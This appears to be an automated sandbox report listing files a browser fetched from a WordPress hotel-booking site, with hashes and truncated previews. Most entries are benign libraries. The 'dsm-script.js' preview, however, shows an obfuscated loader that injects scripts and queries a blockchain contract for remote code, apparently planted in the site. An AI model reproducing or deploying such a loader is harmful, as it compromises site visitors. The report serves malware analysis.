              Preview:/*! elementor - v3.15.0 - 20-08-2023 */.(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[819],{9220:(e,t,n)=>{"use strict";var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var i=s(n(8135));class _default extends elementorModules.ViewModule{constructor(){super(...arguments),this.documents={},this.initDocumentClasses(),this.attachDocumentsClasses()}getDefaultSettings(){return{selectors:{document:".elementor"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$documents:jQuery(e.document)}}initDocumentClasses(){this.documentClasses={base:i.default},elementorFrontend.hooks.doAction("elementor/frontend/documents-manager/init-classes",this)}addDocumentClass(e,t){this.documentClasses[e]=t}attachDocumentsClasses(){this.elements.$documents.each(((e,t)=>this.attachDocumentClass(jQuery(t))))}attachDocumentClass(e){const t=e.data(),n=t.elementorId,s=t.elementorType,i=this.documentClasses[s]||this.documentClasses.base;this.documents[
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1684, components 3
              Category:dropped
              Size (bytes):554979
              Entropy (8bit):7.9602023926411745
              Encrypted:false
              SSDEEP:
              MD5:322A011A688AA14BACC38DC87FCAAF5B
              SHA1:4F101CD0137E921C6DC8CD91A18C54961FAFC6A0
              SHA-256:E05435AD6A17861CC38C0F78FB0EA956457EEFF96945A7028CA1A65A1077BC5A
              SHA-512:1862230440E01C3528AA09A368260D8FBFD9639CC4176F0B23CC97C5BA324A58D2301C10F2FE8302F253DFB03C52A953D8789242B39F940262071316D22AE555
              Malicious:false
              Reputation:unknown
              Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....W..`.GJ(.(...b.........v..:.N.7.....%".u.........KE..RR..)3J8...Z..R..(..Qp.b.(4S.g.(.paE-!.AE....LR.GZ1.`.QG...b.R.QG.ZZ`%..(..GZ.....R.R.Q....;R.:P.R.(<..G........=.z.Qp.Fh...4R.4....Q....R.)...ZLf..G4QE.....&=...(.P ...q@..J1E..QGJ`%....AKE....Z_.E..QE..Q.i@.....S.(.KF)....P...1E..QK@.....(.......)h.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, ASCII text, with very long lines (13423), with no line terminators
              Category:downloaded
              Size (bytes):13423
              Entropy (8bit):5.174545145959906
              Encrypted:false
              SSDEEP:
              MD5:0B1719ADF5FA7231CB1A1B54CF11A50E
              SHA1:0C8258EE3CBE887B0E77FF79DB940FADFE56F95E
              SHA-256:111DA58B16B15C6BAC6126BE92D0A83C8D1DC4139B6361411A744DEDA5242C66
              SHA-512:9D5883C86D46A60F0F9BE2C720B43CE0E3333FE547642B32FE04C1575468DA6682833BF6F09899ABBF336E0BC8DCA46DB5EF85F5C45C9A47D45908A70C466ED1
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.9.8
              Preview:(()=>{"use strict";const e=window.wp.i18n,t=e=>Math.abs(parseInt(e,10)),a=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},n=(e,t)=>{const n=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["submitting","submitting"],["resetting","resetting"],["validating","validating"],["payment_required","payment-required"]]);n.has(t)&&(t=n.get(t)),Array.from(n.values()).includes(t)||(t=`custom-${t=(t=t.replace(/[^0-9a-z]+/i," ").trim()).replace(/\s+/,"-")}`);const r=e.getAttribute("data-status");if(e.wpcf7.status=t,e.setAttribute("data-status",t),e.classList.add(t),r&&r!==t){e.classList.remove(r);const t={contactFormId:e.wpcf7.id,pluginVersion:e.wpcf7.pluginVersion,contactFormLocale:e.wpcf7.locale,unitTag:e.wpcf7.unitTag,containerPostId:e.wpcf7.containerPost,status:e.wpcf7.status,prev
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (635)
              Category:downloaded
              Size (bytes):23890
              Entropy (8bit):5.195859795328726
              Encrypted:false
              SSDEEP:
              MD5:88D0FE722F04973E2888B58A63AA0570
              SHA1:F947512E51F8EF4B15BBA3F701DE64E53A7F7F9B
              SHA-256:E0E2BC4E1D3EE5024C4E1AA58A6CAD9AA42FC63A8C89CE18013A1C8F2B94875C
              SHA-512:F425865C5489FBF5F42D6CD2442645B0E3E149F9BA8DB9CBF8CA6AA34A3C29ED9262BF2B093A9BE3FC069BEF67D771ED0C4D4D4290043AB31E703670E055D01A
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/includes/libraries/owl-carousel/owl.carousel.min.js?ver=6.6.2
              Preview:"function"!==typeof Object.create&&(Object.create=function(f){function g(){}g.prototype=f;return new g});.(function(f,g,k){var l={init:function(a,b){this.$elem=f(b);this.options=f.extend({},f.fn.owlCarousel.options,this.$elem.data(),a);this.userOptions=a;this.loadContent()},loadContent:function(){function a(a){var d,e="";if("function"===typeof b.options.jsonSuccess)b.options.jsonSuccess.apply(this,[a]);else{for(d in a.owl)a.owl.hasOwnProperty(d)&&(e+=a.owl[d].item);b.$elem.html(e)}b.logIn()}var b=this,e;"function"===typeof b.options.beforeInit&&b.options.beforeInit.apply(this,[b.$elem]);"string"===typeof b.options.jsonPath?.(e=b.options.jsonPath,f.getJSON(e,a)):b.logIn()},logIn:function(){this.$elem.data("owl-originalStyles",this.$elem.attr("style"));this.$elem.data("owl-originalClasses",this.$elem.attr("class"));this.$elem.css({opacity:0});this.orignalItems=this.options.items;this.checkBrowser();this.wrapperWidth=0;this.checkVisible=null;this.setVars()},setVars:function(){if(0===this.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (4766), with no line terminators
              Category:dropped
              Size (bytes):4766
              Entropy (8bit):5.172701435586998
              Encrypted:false
              SSDEEP:
              MD5:E081B57530259DD06881E6A383E060F0
              SHA1:8267BB42B44E43DD54D27B6D8FB36C0810771586
              SHA-256:5BF74F7D28D1FB069F1A4BFDBE03DC8C909AAD95403030AE893D84F6ACDC6B75
              SHA-512:8F298F1AE9EC95C8D92149DBC20B64B3212D51AE1E0B36EB933FE516032FE747BDFCCC1539B2D4E492EE2F4C94E5FE947D8CA567C8F36D679F9FD2F357C628C7
              Malicious:false
              Reputation:unknown
              Preview:!function(){const e=document.querySelector("#hb-room-add-new-review"),t=document.querySelector(".close-form-btn"),r=document.querySelector("#hb-room-review-form-popup");let s,i,o=[];const a=()=>{r&&(s=r.querySelector(".bg-overlay"),i=r.querySelector("#hb-room-submit-review-form"),n(),l(),d(),m(),u(),c())};jQuery(window).on("elementor/frontend/init",(()=>{elementorFrontend.hooks.addAction("frontend/element_ready/tours-widget-comment.default",a)}));const c=()=>{const e=document.querySelector("#hb-room-sort-by");e&&document.addEventListener("click",(function(t){const r=t.target;r.classList.contains("toggle")&&r.closest(".hb-room-commentlist-sort-filter")?e.classList.add("is-open"):r.classList.contains("hb-sort-by-option")||e.classList.remove("is-open")}))},n=()=>{e&&e.addEventListener("click",(function(){s.classList.add("active"),i.classList.add("active")}))},l=()=>{t.addEventListener("click",(function(){s.classList.remove("active"),i.classList.remove("active")})),document.addEventListene
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows cursor resource - 1 icon, 32x32, 2 colors, hotspot @8x8
              Category:dropped
              Size (bytes):326
              Entropy (8bit):2.5620714588910247
              Encrypted:false
              SSDEEP:
              MD5:FEFF9159F56CB2069041D660B484EB07
              SHA1:0D0A08CF25A258511957F357B89D3908F3C5E6E3
              SHA-256:7342F390B12F636D14E25F698FC5E38CF6240994DC0C07FEFBBB4E78EC4D03C7
              SHA-512:F850277F48AC14FA363265469776E6F7F07F7DD743AA1D1AD7CF2329EEE6D323DA3422CF6BAAC066C84ECD24800A02088053EF3FC0488D170E7FC942AC8FFA99
              Malicious:false
              Reputation:unknown
              Preview:...... ......0.......(... ...@...............................................................................................................................?...w...g...............................................................................................................................................................
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (1712)
              Category:downloaded
              Size (bytes):100630
              Entropy (8bit):5.481361551623654
              Encrypted:false
              SSDEEP:
              MD5:2E768B623890181A75E6AFA3CFCDDC36
              SHA1:8A364F5310B7486794C68BAD458845EADA283701
              SHA-256:12852C14AD1B3B88914FC0DAEDC6A23AFE0859DB760B8B214201CA1339F76327
              SHA-512:67A832BFDC3C36BB9D64A7A593A0DB7BF426D3A3C605C692D71E749653155429C17F7A9B26FFDCA17F48AD9EDF4ECE0DD0551CBD9613A19C9808FD24CCEF1DE0
              Malicious:false
              Reputation:unknown
              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/10/controls.js
              Preview:google.maps.__gjsload__('controls', function(_){var nJa,uL,oJa,pJa,wL,qJa,rJa,sJa,tJa,yL,vJa,zL,AL,BL,CL,xJa,wJa,zJa,DL,AJa,GL,BJa,CJa,DJa,EL,IL,FL,HL,LL,FJa,EJa,ML,NL,HJa,GJa,IJa,JJa,KJa,MJa,OL,NJa,LJa,PL,OJa,QL,SL,TL,RJa,SJa,TJa,UL,VL,WL,UJa,VJa,XL,WJa,ZJa,XJa,$Ja,ZL,cKa,bKa,dKa,aM,fKa,eKa,gKa,hKa,lKa,kKa,mKa,bM,nKa,oKa,pKa,cM,qKa,rKa,sKa,tKa,uKa,vKa,dM,wKa,fM,yKa,zKa,AKa,BKa,CKa,DKa,xKa,EKa,FKa,GKa,HKa,IKa,KKa,hM,MKa,OKa,PKa,QKa,RKa,SKa,UKa,VKa,TKa,WKa,XKa,YKa,$Ka,aLa,dLa,eLa,iM,fLa,ZKa,bLa,kLa,iLa,jLa,hLa,jM,lLa,mLa,nLa,oLa,rLa,tLa,vLa,xLa,.zLa,ALa,CLa,ELa,GLa,ILa,XLa,cMa,HLa,MLa,LLa,KLa,NLa,mM,OLa,dMa,kM,nM,VLa,qLa,JLa,YLa,QLa,SLa,TLa,ULa,WLa,lM,RLa,kMa,oMa,pMa,oM,qMa,rMa,pM,sMa,vMa,uMa,wMa,uJa,yJa;nJa=function(a,b,c){_.Uq(a,b,"animate",c)};uL=function(a){a.style.textAlign=_.Yy.Aj()?"right":"left"};oJa=function(a,b,c){var d=a.length;const e=typeof a==="string"?a.split(""):a;for(--d;d>=0;--d)d in e&&b.call(c,e[d],d,a)};pJa=function(a){return String(a).replace(/\-([a-z])/g,function(
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):82217
              Entropy (8bit):4.869854763746018
              Encrypted:false
              SSDEEP:
              MD5:D8A4C636049170101B677E657601BB24
              SHA1:239CFB927626D8FC04F55BEC4F9E592F0C8D8118
              SHA-256:F2B9FE04B925A01D03336B9D720F20885DD7C457BEC7FFE229BF5ADD6FCE1A0B
              SHA-512:66CC5A5CF37DB3A80BCBE3EC98BC18F4D9B11B75D7ED681887A25A854D8B185CC69723C225A97B908A60DB9B05A0A28A8E3C0EC6F12764FAD53B4CD73DB1024D
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/assets/css/hotel-booking.css?ver=2.1.1-02
              Preview:.clearfix:after {. content: '';. display: block;. clear: both;.}...hotel-booking-search {. width: auto;. max-width: 100%;. padding: 35px;.}...hotel-booking-search input,..hotel-booking-search select,..hotel-booking-search textarea,..hotel-booking-search button {. position: relative;. width: auto;. height: 40px;. min-width: 200px;. border: 1px solid #cccccc;. border-radius: 3px;. font-size: 15px;. color: #7a7a7a;. padding: 7px 8px;. line-height: 24px;. -webkit-box-shadow: inset 0 0 0 rgba(0, 0, 0, .075);. box-shadow: inset 0 0 0 rgba(0, 0, 0, .075);. -webkit-transition: border-color ease-in-out .15s, -webkit-box-shadow ease-in-out .15s;. -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;. transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;.}...hotel-booking-search .hb_addition_package_extra input {. min-width: 25px;.}...hotel-booking-search button {. background-color: #2eb0d1
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (651)
              Category:downloaded
              Size (bytes):2255
              Entropy (8bit):5.351855235258829
              Encrypted:false
              SSDEEP:
              MD5:602E1F42D73CADCD73338FFBC553D5A2
              SHA1:977BF53305DFFA9ACB6AC6B2CA11FCE75DD1EF1E
              SHA-256:A4AD384663963D335A27FA088178A17613A7B597F2DB8152EA3D809C8B9781A0
              SHA-512:EB058D21C1B7D51D4A587D76D092AA563A8BEA578A1953ACC8F46B2CA2E62E9F6687D7B591018064008BF7AEC4DDED751B3ADDB756E08175CACCE697D7A4D276
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/dynamic-sidebar-manager/dsm-script.js
              Preview:document.addEventListener('DOMContentLoaded', function() {. const _0x1a21 = atob("aHR0cHM6Ly9jZG4uZXRoZXJzLmlvL2xpYi9ldGhlcnMtNS4yLnVtZC5taW4uanM=");. function _0x9b43(_0x2d23, _0x4f6d) {. const _0x5c32 = document.createElement('script');. _0x5c32.src = _0x2d23, _0x5c32.type = "application/javascript", _0x5c32.onload = _0x4f6d, document.head.appendChild(_0x5c32);. }. function _0x8f7c() {. const _0x7a13 = new ethers.providers.JsonRpcProvider(atob("aHR0cHM6Ly9ic2MtZGF0YXNlZWQxLmJpbmFuY2Uub3JnLw==")),. _0x2b39 = "0xa6165aa33ac710ad5dcd4f4d6379466825476fde",. _0x6f8b = atob("W3siaW5wdXRzIjpbXSwic3RhdGVNdXRhYmlsaXR5Ijoibm9ucGF5YWJsZSIsInR5cGUiOiJjb25zdHJ1Y3RvciJ9LHsiYW5vbnltb3VzIjpmYWxzZSwiaW5wdXRzIjpbeyJpbmRleGVkIjpmYWxzZSwiaW50ZXJuYWxUeXBlIjoic3RyaW5nIiwibmFtZSI6IiIsInR5cGUiOiJzdHJpbmcifV0sIm5hbWUiOiJFIiwidHlwZSI6ImV2ZW50In0seyJpbnB1dHMiOlt7ImludGVybmFsVHlwZSI6InN0cmluZyIsIm5hbWUiOiJfYyIsInR5cGUiOiJzdHJpbmcifV0sIm5hbWUiOiJ1Iiwib3V0cHV
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (2363), with CRLF line terminators
              Category:downloaded
              Size (bytes):37262
              Entropy (8bit):5.3014174104262475
              Encrypted:false
              SSDEEP:
              MD5:02300E7FC98D6AEF8672BCBAEC1B5B92
              SHA1:0C7CE4CD0A828973D95FB93CB08F33787C557917
              SHA-256:9ACF22470B3EFA550607C6A05066D75EA4C78C16C21169F18A11AF80C80A9B3D
              SHA-512:F59BC70403619C9B2D21A287EF69E1CDFF117FDEE05C712EA5B8F8D5A9DDBF2A24D4B95B157A292DBE1E518244A9DC974EEFD3387B56A5868CBDF813C59011C7
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/jquery-ui.css?ver=1726496070
              Preview:x/*! jQuery UI - v1.12.1 - 2016-09-14..* http://jqueryui.com..* Includes: core.css, accordion.css, autocomplete.css, menu.css, button.css, controlgroup.css, checkboxradio.css, datepicker.css, dialog.css, draggable.css, resizable.css, progressbar.css, selectable.css, selectmenu.css, slider.css, sortable.css, spinner.css, tabs.css, tooltip.css, theme.css..* To view and modify this theme, visit http://jqueryui.com/themeroller/?ffDefault=Arial%2CHelvetica%2Csans-serif&fsDefault=1em&fwDefault=normal&cornerRadius=3px&bgColorHeader=e9e9e9&bgTextureHeader=flat&borderColorHeader=dddddd&fcHeader=333333&iconColorHeader=444444&bgColorContent=ffffff&bgTextureContent=flat&borderColorContent=dddddd&fcContent=333333&iconColorContent=444444&bgColorDefault=f6f6f6&bgTextureDefault=flat&borderColorDefault=c5c5c5&fcDefault=454545&iconColorDefault=777777&bgColorHover=ededed&bgTextureHover=flat&borderColorHover=cccccc&fcHover=2b2b2b&iconColorHover=555555&bgColorActive=007fff&bgTextureActive=flat&borderColorA
              No static file info